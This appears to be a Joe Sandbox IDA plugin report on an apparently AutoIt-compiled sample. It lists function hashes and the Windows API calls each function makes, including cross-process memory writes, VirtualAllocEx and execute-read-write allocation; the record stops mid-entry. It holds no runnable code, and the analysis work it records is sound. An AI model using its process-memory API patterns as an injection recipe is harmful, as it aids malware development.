• Instruction ID: 1c38367c3f78b1a3925ad5b8afcb0169b2e7bc62977a538f451d1a856bd5bc82
• Opcode Fuzzy Hash: 60d752684db7a766774439e824a35e5fba1f2cb7619ccadd9010d1cf66fb0297
• Instruction Fuzzy Hash: 09517C31B1C6099ADB127714CD013BF3BE89BC1700F248D59E4D9862E9DE7A8DC4AF86
APIs
Similarity
• API ID: _memset$_memmove
• String ID: ERCP
• API String ID: 2532777613-1384759551
• Opcode ID: bb07427525012e0f0433da60b09c48d3ce5100550acb4c9f90dace6b6e45c2bb
• Instruction ID: 71473f31d5d3fc49e37058c5f86b383fba658108c3f3c72ca96fb9030ccc129a
• Opcode Fuzzy Hash: bb07427525012e0f0433da60b09c48d3ce5100550acb4c9f90dace6b6e45c2bb
• Instruction Fuzzy Hash: AC51A071A00309DFDB24CFA9C881BAAB7F4FF44314F20466EE55ACB291E770AA54CB40
APIs
  • Part of subcall function 009414BC: WriteProcessMemory.KERNEL32(?,?,?,00000000,00000000,00000000,?,00939296,?,?,00000034,00000800,?,00000034), ref: 009414E6
• SendMessageW.USER32(?,00001104,00000000,00000000), ref: 0093983F
  • Part of subcall function 00941487: ReadProcessMemory.KERNEL32(?,?,?,00000000,00000000,00000000,?,009392C5,?,?,00000800,?,00001073,00000000,?,?), ref: 009414B1
  • Part of subcall function 009413DE: GetWindowThreadProcessId.USER32(?,?), ref: 00941409
  • Part of subcall function 009413DE: OpenProcess.KERNEL32(00000438,00000000,?,?,?,0093925A,00000034,?,?,00001004,00000000,00000000), ref: 00941419
  • Part of subcall function 009413DE: VirtualAllocEx.KERNEL32(00000000,00000000,?,00001000,00000004,?,?,0093925A,00000034,?,?,00001004,00000000,00000000), ref: 0094142F
• SendMessageW.USER32(?,00001111,00000000,00000000), ref: 009398AC
• SendMessageW.USER32(?,00001111,00000000,00000000), ref: 009398F9
Similarity
• API ID: Process$MessageSend$Memory$AllocOpenReadThreadVirtualWindowWrite
• String ID: @
• API String ID: 4150878124-2766056989
• Opcode ID: d1bcdd53ce2c869c978f04da9cc020bf1c985fc07896b41e669bf826ba291277
• Instruction ID: 23901670ff686b9122f40d43bc080dd15e68a9798120221265a0cc3efd1cc23f
• Opcode Fuzzy Hash: d1bcdd53ce2c869c978f04da9cc020bf1c985fc07896b41e669bf826ba291277
• Instruction Fuzzy Hash: 4E413B7690021CAFDB10EFA4CC81FDEBBB8EB49300F004199FA55B7191DA716E85CBA1
APIs
• SetWindowPos.USER32(00000000,00000000,00000000,00000000,00000000,00000000,00000013,?,?,SysTreeView32,0096F910,00000000,?,?,?,?), ref: 009679DF
• GetWindowLongW.USER32 ref: 009679FC
• SetWindowLongW.USER32(?,000000F0,00000000), ref: 00967A0C
Similarity
• API ID: Window$Long
• String ID: SysTreeView32
• API String ID: 847901565-1698111956
• Opcode ID: f82ef30e8b06e214939d27f5a793a6e5afb95007c80e6cf6e0fdba600da57f58
• Instruction ID: fb3ae5223e64d99056ef35208a57a0d4bd3f8fb5ab185884f638c95ac2e3980d
• Opcode Fuzzy Hash: f82ef30e8b06e214939d27f5a793a6e5afb95007c80e6cf6e0fdba600da57f58
• Instruction Fuzzy Hash: C3319E31204606ABDB118FB8DC45BEAB7A9FF45328F244725F875E22E0D731ED519B50
APIs
• SendMessageW.USER32(00000000,00001009,00000000,?), ref: 00967461
• SetWindowPos.USER32(?,00000000,?,?,?,?,00000004), ref: 00967475
• SendMessageW.USER32(?,00001002,00000000,?), ref: 00967499
                                                                                                                Strings
                                                                                                                Memory Dump Source
                                                                                                                • Source File: 00000000.00000002.2158618379.00000000008E1000.00000020.00000001.01000000.00000003.sdmp, Offset: 008E0000, based on PE: true
                                                                                                                • Associated: 00000000.00000002.2158468915.00000000008E0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                • Associated: 00000000.00000002.2158767852.000000000096F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                • Associated: 00000000.00000002.2158767852.0000000000994000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                • Associated: 00000000.00000002.2158820268.000000000099E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                • Associated: 00000000.00000002.2158934239.00000000009A7000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                • Snapshot File: hcaresult_0_2_8e0000_6cicUo3f8g.jbxd
                                                                                                                Similarity
                                                                                                                • API ID: MessageSend$Window
                                                                                                                • String ID: SysMonthCal32
                                                                                                                • API String ID: 2326795674-1439706946
                                                                                                                • Opcode ID: 0635d594ce1347ff2c07d444a61592aa08ae6ab966d6dad2969e287eefb27f66
                                                                                                                • Instruction ID: 1a17c7b3061af426623fcb43f797b2d6337b09123298134b68e153c09085fac3
                                                                                                                • Opcode Fuzzy Hash: 0635d594ce1347ff2c07d444a61592aa08ae6ab966d6dad2969e287eefb27f66
                                                                                                                • Instruction Fuzzy Hash: 85219132614218BBDF118F94CC46FEA7B6AEF48728F110114FE156B1E0DAB5AC91DBA0
                                                                                                                APIs
                                                                                                                • SendMessageW.USER32(00000000,00000469,?,00000000), ref: 00967C4A
                                                                                                                • SendMessageW.USER32(00000000,00000465,00000000,80017FFF), ref: 00967C58
                                                                                                                • DestroyWindow.USER32(00000000,00000000,?,?,?,00000000,msctls_updown32,00000000,00000000,00000000,00000000,00000000,00000000,?,?,00000000), ref: 00967C5F
                                                                                                                Strings
                                                                                                                Memory Dump Source
                                                                                                                • Source File: 00000000.00000002.2158618379.00000000008E1000.00000020.00000001.01000000.00000003.sdmp, Offset: 008E0000, based on PE: true
                                                                                                                • Associated: 00000000.00000002.2158468915.00000000008E0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                • Associated: 00000000.00000002.2158767852.000000000096F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                • Associated: 00000000.00000002.2158767852.0000000000994000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                • Associated: 00000000.00000002.2158820268.000000000099E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                • Associated: 00000000.00000002.2158934239.00000000009A7000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                • Snapshot File: hcaresult_0_2_8e0000_6cicUo3f8g.jbxd
                                                                                                                Similarity
                                                                                                                • API ID: MessageSend$DestroyWindow
                                                                                                                • String ID: msctls_updown32
                                                                                                                • API String ID: 4014797782-2298589950
                                                                                                                • Opcode ID: d4062ccad2474525ad452d604fd9e217209cee484b8d66f2173e2a8c5d1564d7
                                                                                                                • Instruction ID: 8f83a967aea5e99d730e19406222c209720a1aff039482afc6d6fb810eb93ffa
                                                                                                                • Opcode Fuzzy Hash: d4062ccad2474525ad452d604fd9e217209cee484b8d66f2173e2a8c5d1564d7
                                                                                                                • Instruction Fuzzy Hash: 3B218EB1204208AFEB10DF68DCC1DA677ECEF5A358B150059FA119B3A1CB35EC519AA0
                                                                                                                APIs
                                                                                                                • SendMessageW.USER32(00000000,00000180,00000000,?), ref: 00966D3B
                                                                                                                • SendMessageW.USER32(?,00000186,00000000,00000000), ref: 00966D4B
                                                                                                                • MoveWindow.USER32(?,?,?,?,?,00000000,?,?,Listbox,00000000,00000000,?,?,?,?,?), ref: 00966D70
                                                                                                                Strings
                                                                                                                Memory Dump Source
                                                                                                                • Source File: 00000000.00000002.2158618379.00000000008E1000.00000020.00000001.01000000.00000003.sdmp, Offset: 008E0000, based on PE: true
                                                                                                                • Associated: 00000000.00000002.2158468915.00000000008E0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                • Associated: 00000000.00000002.2158767852.000000000096F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                • Associated: 00000000.00000002.2158767852.0000000000994000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                • Associated: 00000000.00000002.2158820268.000000000099E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                • Associated: 00000000.00000002.2158934239.00000000009A7000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                • Snapshot File: hcaresult_0_2_8e0000_6cicUo3f8g.jbxd
                                                                                                                Similarity
                                                                                                                • API ID: MessageSend$MoveWindow
                                                                                                                • String ID: Listbox
                                                                                                                • API String ID: 3315199576-2633736733
                                                                                                                • Opcode ID: fe45eb141261dd3760496323adfd0a3e46289732d0f3bd863ea9d1f0796aa9db
                                                                                                                • Instruction ID: 39c91ca7572d041c2099bca1b3467d8a169fa702160f4bd392e4a367bc8a5ff8
                                                                                                                • Opcode Fuzzy Hash: fe45eb141261dd3760496323adfd0a3e46289732d0f3bd863ea9d1f0796aa9db
                                                                                                                • Instruction Fuzzy Hash: B4219232614118BFDF118F58DC45FAB3BBEEF89754F018128FA459B1A0C6759C519BA0
                                                                                                                APIs
                                                                                                                • SendMessageW.USER32(00000000,00000405,00000000,00000000), ref: 00967772
                                                                                                                • SendMessageW.USER32(?,00000406,00000000,00640000), ref: 00967787
                                                                                                                • SendMessageW.USER32(?,00000414,0000000A,00000000), ref: 00967794
                                                                                                                Strings
                                                                                                                Memory Dump Source
                                                                                                                • Source File: 00000000.00000002.2158618379.00000000008E1000.00000020.00000001.01000000.00000003.sdmp, Offset: 008E0000, based on PE: true
                                                                                                                • Associated: 00000000.00000002.2158468915.00000000008E0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                • Associated: 00000000.00000002.2158767852.000000000096F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                • Associated: 00000000.00000002.2158767852.0000000000994000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                • Associated: 00000000.00000002.2158820268.000000000099E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                • Associated: 00000000.00000002.2158934239.00000000009A7000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                • Snapshot File: hcaresult_0_2_8e0000_6cicUo3f8g.jbxd
                                                                                                                Similarity
                                                                                                                • API ID: MessageSend
                                                                                                                • String ID: msctls_trackbar32
                                                                                                                • API String ID: 3850602802-1010561917
                                                                                                                • Opcode ID: 269e9abc93e6ca7c700399fe5fbcfdda45e50ed0b77737cced1e0bf21ac03405
                                                                                                                • Instruction ID: 53212f5e65be101c3776d1bc51df6bf232a506eecc255ce6c65d7afa2c40e7a5
                                                                                                                • Opcode Fuzzy Hash: 269e9abc93e6ca7c700399fe5fbcfdda45e50ed0b77737cced1e0bf21ac03405
                                                                                                                • Instruction Fuzzy Hash: 3D113A72204208BFEF105FA5CC05FE7776CEF89B58F01011CF641A2090D272E811DB20
                                                                                                                APIs
                                                                                                                • LoadLibraryA.KERNEL32(kernel32.dll,?,008E4BD0,?,008E4DEF,?,009A52F8,00000001,>>>AUTOIT NO CMDEXECUTE<<<,?), ref: 008E4C11
                                                                                                                • GetProcAddress.KERNEL32(00000000,Wow64DisableWow64FsRedirection), ref: 008E4C23
                                                                                                                Strings
                                                                                                                Memory Dump Source
                                                                                                                • Source File: 00000000.00000002.2158618379.00000000008E1000.00000020.00000001.01000000.00000003.sdmp, Offset: 008E0000, based on PE: true
                                                                                                                • Associated: 00000000.00000002.2158468915.00000000008E0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                • Associated: 00000000.00000002.2158767852.000000000096F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                • Associated: 00000000.00000002.2158767852.0000000000994000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                • Associated: 00000000.00000002.2158820268.000000000099E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                • Associated: 00000000.00000002.2158934239.00000000009A7000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                • Snapshot File: hcaresult_0_2_8e0000_6cicUo3f8g.jbxd
                                                                                                                Similarity
                                                                                                                • API ID: AddressLibraryLoadProc
                                                                                                                • String ID: Wow64DisableWow64FsRedirection$kernel32.dll
                                                                                                                • API String ID: 2574300362-3689287502
                                                                                                                • Opcode ID: 6a08b86e4f668f3f08c17d005e66d38904103d4f0399c36c8fa3212597b38560
                                                                                                                • Instruction ID: a6db747bb597c848cee17d6aa006b05060c3e1b8a38ce335c14c3a544229678e
                                                                                                                • Opcode Fuzzy Hash: 6a08b86e4f668f3f08c17d005e66d38904103d4f0399c36c8fa3212597b38560
                                                                                                                • Instruction Fuzzy Hash: 52D01230515B13CFD7209F75E918607B6D5FF0A395B129C3EE489D6150E6B0D480C751
                                                                                                                APIs
                                                                                                                • LoadLibraryA.KERNEL32(kernel32.dll,?,008E4B83,?), ref: 008E4C44
                                                                                                                • GetProcAddress.KERNEL32(00000000,Wow64RevertWow64FsRedirection), ref: 008E4C56
                                                                                                                Strings
                                                                                                                Memory Dump Source
                                                                                                                • Source File: 00000000.00000002.2158618379.00000000008E1000.00000020.00000001.01000000.00000003.sdmp, Offset: 008E0000, based on PE: true
                                                                                                                • Associated: 00000000.00000002.2158468915.00000000008E0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                • Associated: 00000000.00000002.2158767852.000000000096F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                • Associated: 00000000.00000002.2158767852.0000000000994000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                • Associated: 00000000.00000002.2158820268.000000000099E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                • Associated: 00000000.00000002.2158934239.00000000009A7000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                • Snapshot File: hcaresult_0_2_8e0000_6cicUo3f8g.jbxd
                                                                                                                Similarity
                                                                                                                • API ID: AddressLibraryLoadProc
                                                                                                                • String ID: Wow64RevertWow64FsRedirection$kernel32.dll
                                                                                                                • API String ID: 2574300362-1355242751
                                                                                                                • Opcode ID: 74543c2da1871a1fe555f91741dd89a095a61fd002b835e1443bbf6a2bb66dd8
                                                                                                                • Instruction ID: 7f9dd46dc4bdb7792a2e538bc3ac6e5de318f25d1f4d5bed6b09550341483a4f
                                                                                                                • Opcode Fuzzy Hash: 74543c2da1871a1fe555f91741dd89a095a61fd002b835e1443bbf6a2bb66dd8
                                                                                                                • Instruction Fuzzy Hash: D7D01730528713CFDB209F36E91861A76E4FF1A395B22983EE49AD6160E6B4D880CA50
                                                                                                                APIs
                                                                                                                • LoadLibraryA.KERNEL32(advapi32.dll,?,00961039), ref: 00960DF5
                                                                                                                • GetProcAddress.KERNEL32(00000000,RegDeleteKeyExW), ref: 00960E07
                                                                                                                Strings
                                                                                                                Memory Dump Source
                                                                                                                • Source File: 00000000.00000002.2158618379.00000000008E1000.00000020.00000001.01000000.00000003.sdmp, Offset: 008E0000, based on PE: true
                                                                                                                • Associated: 00000000.00000002.2158468915.00000000008E0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                • Associated: 00000000.00000002.2158767852.000000000096F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                • Associated: 00000000.00000002.2158767852.0000000000994000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                • Associated: 00000000.00000002.2158820268.000000000099E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                • Associated: 00000000.00000002.2158934239.00000000009A7000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                • Snapshot File: hcaresult_0_2_8e0000_6cicUo3f8g.jbxd
                                                                                                                Similarity
                                                                                                                • API ID: AddressLibraryLoadProc
                                                                                                                • String ID: RegDeleteKeyExW$advapi32.dll
                                                                                                                • API String ID: 2574300362-4033151799
                                                                                                                • Opcode ID: 6c4a0a4e250d1f18d0b2b1a803532c81a3a3aa6fa92a2e7668c8d3112f05f626
                                                                                                                • Instruction ID: f0906cdda6146f94d5a705054fb01d4b9f7ab9a7cd75a0177088ea86fe269a4b
                                                                                                                • Opcode Fuzzy Hash: 6c4a0a4e250d1f18d0b2b1a803532c81a3a3aa6fa92a2e7668c8d3112f05f626
                                                                                                                • Instruction Fuzzy Hash: 37D02E30424323CFEB218F78D84828372E8AF81382F02CC3EE882C2150E7F1D8A0CA00
                                                                                                                APIs
                                                                                                                • LoadLibraryA.KERNEL32(kernel32.dll,00000001,00958CF4,?,0096F910), ref: 009590EE
                                                                                                                • GetProcAddress.KERNEL32(00000000,GetModuleHandleExW), ref: 00959100
                                                                                                                Strings
                                                                                                                Memory Dump Source
                                                                                                                • Source File: 00000000.00000002.2158618379.00000000008E1000.00000020.00000001.01000000.00000003.sdmp, Offset: 008E0000, based on PE: true
                                                                                                                • Associated: 00000000.00000002.2158468915.00000000008E0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                • Associated: 00000000.00000002.2158767852.000000000096F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                • Associated: 00000000.00000002.2158767852.0000000000994000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                • Associated: 00000000.00000002.2158820268.000000000099E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                • Associated: 00000000.00000002.2158934239.00000000009A7000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                • Snapshot File: hcaresult_0_2_8e0000_6cicUo3f8g.jbxd
                                                                                                                Similarity
                                                                                                                • API ID: AddressLibraryLoadProc
                                                                                                                • String ID: GetModuleHandleExW$kernel32.dll
                                                                                                                • API String ID: 2574300362-199464113
                                                                                                                • Opcode ID: 5bb3aa554a64c290ad905c2977b874ce69c9a2ef9595d2198a7817aba875a19a
                                                                                                                • Instruction ID: b3c5e16cc1cf4d9154e9138358b4af1c5c027e60af3cb219292d296825b2034d
• Opcode Fuzzy Hash: 5bb3aa554a64c290ad905c2977b874ce69c9a2ef9595d2198a7817aba875a19a
• Instruction Fuzzy Hash: E3D0123452C723CFDB20DF35E82850676D8AF06396B12883ED886D6550E7B0C480C790
APIs
Strings
Memory Dump Source
• Source File: 00000000.00000002.2158618379.00000000008E1000.00000020.00000001.01000000.00000003.sdmp, Offset: 008E0000, based on PE: true
• Associated: 00000000.00000002.2158468915.00000000008E0000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2158767852.000000000096F000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2158767852.0000000000994000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2158820268.000000000099E000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2158934239.00000000009A7000.00000002.00000001.01000000.00000003.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_0_2_8e0000_6cicUo3f8g.jbxd
Similarity
• API ID: LocalTime__swprintf
• String ID: %.3d$WIN_XPe
• API String ID: 2070861257-2409531811
• Opcode ID: 215f754ab8aa885d44a7859018c18b9b198651334db5a3b94f40dc2100e33298
• Instruction ID: a2a58d13a15e850eb8054682e253c4c4b5b207736dddd0f69380c35de886c259
• Opcode Fuzzy Hash: 215f754ab8aa885d44a7859018c18b9b198651334db5a3b94f40dc2100e33298
• Instruction Fuzzy Hash: 11D01271818128EBCB109790A8998BD73BCB7A9301F100866F402D2044E2298765EA25
Memory Dump Source
• Source File: 00000000.00000002.2158618379.00000000008E1000.00000020.00000001.01000000.00000003.sdmp, Offset: 008E0000, based on PE: true
• Associated: 00000000.00000002.2158468915.00000000008E0000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2158767852.000000000096F000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2158767852.0000000000994000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2158820268.000000000099E000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2158934239.00000000009A7000.00000002.00000001.01000000.00000003.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_0_2_8e0000_6cicUo3f8g.jbxd
Similarity
• API ID:
• String ID:
• API String ID:
• Opcode ID: c4ad254dca96ea682ce81fcc829ca5cf49ee9011c148cc7a56a1af9ef13d9b6e
• Instruction ID: b40f3acee6501fbd39880749cfdbe6e645e20419c932e732fb7d8371f77d5724
• Opcode Fuzzy Hash: c4ad254dca96ea682ce81fcc829ca5cf49ee9011c148cc7a56a1af9ef13d9b6e
• Instruction Fuzzy Hash: 0BC11CB5A0421AAFCB24CF94C884AAEFBB9FF48714F154598E815DB261D730ED41DF90
APIs
• CharLowerBuffW.USER32(?,?), ref: 0095E0BE
• CharLowerBuffW.USER32(?,?), ref: 0095E101
  • Part of subcall function 0095D7A5: CharLowerBuffW.USER32(?,?,?,?,00000000,?,?), ref: 0095D7C5
• VirtualAlloc.KERNEL32(00000000,00000077,00003000,00000040), ref: 0095E301
• _memmove.LIBCMT ref: 0095E314
Memory Dump Source
• Source File: 00000000.00000002.2158618379.00000000008E1000.00000020.00000001.01000000.00000003.sdmp, Offset: 008E0000, based on PE: true
• Associated: 00000000.00000002.2158468915.00000000008E0000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2158767852.000000000096F000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2158767852.0000000000994000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2158820268.000000000099E000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2158934239.00000000009A7000.00000002.00000001.01000000.00000003.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_0_2_8e0000_6cicUo3f8g.jbxd
Similarity
• API ID: BuffCharLower$AllocVirtual_memmove
• String ID:
• API String ID: 3659485706-0
• Opcode ID: aeac7ffb976a47c639aa1fb92f041277d09a341f2af9b3df801800adfd8ce45f
• Instruction ID: 1fa9be72e66bba6fd1a4c6f4a95f190a633f2dccb7b7ec690bad6e2c6ff6a417
• Opcode Fuzzy Hash: aeac7ffb976a47c639aa1fb92f041277d09a341f2af9b3df801800adfd8ce45f
• Instruction Fuzzy Hash: B3C158716083519FC718DF29C480A6ABBE4FF89714F04896EF899DB351D731EA49CB82
APIs
• CoInitialize.OLE32(00000000), ref: 009580C3
• CoUninitialize.OLE32 ref: 009580CE
  • Part of subcall function 0093D56C: CoCreateInstance.OLE32(?,00000000,00000005,?,?,?,?,?,?,?,?,?,?,?), ref: 0093D5D4
• VariantInit.OLEAUT32(?), ref: 009580D9
• VariantClear.OLEAUT32(?), ref: 009583AA
Memory Dump Source
• Source File: 00000000.00000002.2158618379.00000000008E1000.00000020.00000001.01000000.00000003.sdmp, Offset: 008E0000, based on PE: true
• Associated: 00000000.00000002.2158468915.00000000008E0000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2158767852.000000000096F000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2158767852.0000000000994000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2158820268.000000000099E000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2158934239.00000000009A7000.00000002.00000001.01000000.00000003.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_0_2_8e0000_6cicUo3f8g.jbxd
Similarity
• API ID: Variant$ClearCreateInitInitializeInstanceUninitialize
• String ID:
• API String ID: 780911581-0
• Opcode ID: 76a61185d35348a2b7c87daca2750abfe964c5f355ae368da02a6fc23b83741a
• Instruction ID: 32c6106f0e65c36686db2e05a957789aefbd71748809d6b25157a3167a6c29e6
• Opcode Fuzzy Hash: 76a61185d35348a2b7c87daca2750abfe964c5f355ae368da02a6fc23b83741a
• Instruction Fuzzy Hash: 5BA16A752047519FCB00DF5AC481B2AB7E4FF8A354F044858F99AAB3A1CB74ED05CB42
APIs
• ProgIDFromCLSID.OLE32(?,00000000,?,00000000,00000800,00000000,?,00972C7C,?), ref: 009376EA
• CoTaskMemFree.OLE32(00000000,00000000,?,00000000,00000800,00000000,?,00972C7C,?), ref: 00937702
• CLSIDFromProgID.OLE32(?,?,00000000,0096FB80,000000FF,?,00000000,00000800,00000000,?,00972C7C,?), ref: 00937727
• _memcmp.LIBCMT ref: 00937748
Memory Dump Source
• Source File: 00000000.00000002.2158618379.00000000008E1000.00000020.00000001.01000000.00000003.sdmp, Offset: 008E0000, based on PE: true
• Associated: 00000000.00000002.2158468915.00000000008E0000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2158767852.000000000096F000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2158767852.0000000000994000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2158820268.000000000099E000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2158934239.00000000009A7000.00000002.00000001.01000000.00000003.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_0_2_8e0000_6cicUo3f8g.jbxd
Similarity
• API ID: FromProg$FreeTask_memcmp
• String ID:
• API String ID: 314563124-0
• Opcode ID: 69349a8082dfa8bde481355a92a7058d95201ae27eb28516b73231c7d362e4e3
• Instruction ID: 27e6d1ab5363044432bf1b0511b46018fa6257aff24593fa040c3f373a1d42ec
• Opcode Fuzzy Hash: 69349a8082dfa8bde481355a92a7058d95201ae27eb28516b73231c7d362e4e3
• Instruction Fuzzy Hash: 19810A71A00109AFCB14DFE4C994EEEB7B9FF89315F204558E506AB250DB71AE05CF61
APIs
Memory Dump Source
• Source File: 00000000.00000002.2158618379.00000000008E1000.00000020.00000001.01000000.00000003.sdmp, Offset: 008E0000, based on PE: true
• Associated: 00000000.00000002.2158468915.00000000008E0000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2158767852.000000000096F000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2158767852.0000000000994000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2158820268.000000000099E000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2158934239.00000000009A7000.00000002.00000001.01000000.00000003.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_0_2_8e0000_6cicUo3f8g.jbxd
Similarity
• API ID: Variant$AllocClearCopyInitString
• String ID:
• API String ID: 2808897238-0
• Opcode ID: 5d8e915b9fd6ce141de9e0e5dc8f8a57097f9e0e544bf485e0dbd06a179aa815
• Instruction ID: b17d2aa1685d745e55fb3e084262f7295b7ef398b361cca0ab3fdf7047cc7aae
• Opcode Fuzzy Hash: 5d8e915b9fd6ce141de9e0e5dc8f8a57097f9e0e544bf485e0dbd06a179aa815
• Instruction Fuzzy Hash: 7C51A174704301BEDB24AF69D895B2AF3E9AF85310F20D81FE596DB291DB74D8408F12
APIs
• GetWindowRect.USER32(0145E848,?), ref: 00969863
• ScreenToClient.USER32(00000002,00000002), ref: 00969896
• MoveWindow.USER32(?,?,?,?,000000FF,00000001,?,?,00000002,?,?), ref: 00969903
Memory Dump Source
• Source File: 00000000.00000002.2158618379.00000000008E1000.00000020.00000001.01000000.00000003.sdmp, Offset: 008E0000, based on PE: true
• Associated: 00000000.00000002.2158468915.00000000008E0000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2158767852.000000000096F000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2158767852.0000000000994000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2158820268.000000000099E000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2158934239.00000000009A7000.00000002.00000001.01000000.00000003.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_0_2_8e0000_6cicUo3f8g.jbxd
Similarity
• API ID: Window$ClientMoveRectScreen
• String ID:
• API String ID: 3880355969-0
• Opcode ID: 314c20d2d8329855c4dd1d6aaf87315c1d8bed0664b1645219dfb12ecfd9cb3b
• Instruction ID: 7208a286059bb852c139ccf8d4038f65806bb9e584a7435d375d986039be60b1
• Opcode Fuzzy Hash: 314c20d2d8329855c4dd1d6aaf87315c1d8bed0664b1645219dfb12ecfd9cb3b
• Instruction Fuzzy Hash: 86515F74A00209EFDF10CF68D984AAE7BB9FF46360F14816DF8659B2A0D731AD41DB90
APIs
• SendMessageW.USER32(?,0000110A,00000004,00000000), ref: 00939AD2
• __itow.LIBCMT ref: 00939B03
  • Part of subcall function 00939D53: SendMessageW.USER32(?,0000113E,00000000,00000000), ref: 00939DBE
• SendMessageW.USER32(?,0000110A,00000001,?), ref: 00939B6C
• __itow.LIBCMT ref: 00939BC3
Memory Dump Source
• Source File: 00000000.00000002.2158618379.00000000008E1000.00000020.00000001.01000000.00000003.sdmp, Offset: 008E0000, based on PE: true
• Associated: 00000000.00000002.2158468915.00000000008E0000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2158767852.000000000096F000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2158767852.0000000000994000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2158820268.000000000099E000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2158934239.00000000009A7000.00000002.00000001.01000000.00000003.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_0_2_8e0000_6cicUo3f8g.jbxd
Similarity
• API ID: MessageSend$__itow
• String ID:
• API String ID: 3379773720-0
• Opcode ID: 2e952ee4c5bf1b2ab0e51a0a8271510dcdd5508e29eb9dd7d0c20b017d870604
• Instruction ID: fcd9bdb81747eaf71c3473840decdfcf2c3718f262d73f60e9185ee97ec418dd
